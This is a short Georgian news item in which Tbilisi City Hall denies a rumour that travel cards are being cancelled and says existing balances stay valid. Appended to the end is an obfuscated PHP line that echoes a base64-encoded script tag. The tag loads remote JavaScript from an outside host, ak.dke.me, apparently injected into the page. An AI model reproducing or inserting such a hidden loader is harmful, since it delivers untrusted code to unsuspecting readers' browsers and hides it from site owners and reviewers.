celsiusi
ავერსი საქკაბელი
თბილისის მერია სოციალურ ქსელში გავრცელებულ ინფორმაციაზე, რომლიც თანახმად თითქოსდა მოქმედი სამგზავრო ბარათები უქმდება, სპეციალურ განცხადებას ავრცელებს. 
 
"აღნიშნული ინფორმაცია სიცრუეა. სამგზავრო ბარათები კვლავ რჩება მგზავრობის საფასურის ერჯერადი გადახდის უნივერსალურ საშუალებად, სამგზავრო აბონემენტების პარალელურად. გარდა ამისა, სრულად ნარჩუნდება ბარათზე აქამდე არსებული ბალანსები და აღნიშნული თანხის გამოყენება მგზავრს შეუფერხებლად შეუძლია. 
 
მეტრომანით მგზავრობის საფასურის გადახდა აქამდე შესაძლებელი იყო მეტროთი, ავტობუსით და საბაგიროთი მგზავრობისას, ამჟამად კი, ასევე,  შესაძლებელია ლურჯი მიკროავტობუსით მგზავრობისას. 
 
თბილისის მერიამ არაერთხელ გააკეთა განცხადება, რომ აქამდე მოქმედი ბარათები რჩებოდა ძალაში. მომავალშიც, ნებისმიერი მსგავსი სიახლის შესახებ ინფორმაციას პირველ რიგში, მერია გაავრცელებს, - ნათქვამია მერიის მიერ გავრცელებულ განცხადებაში. 
1138
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");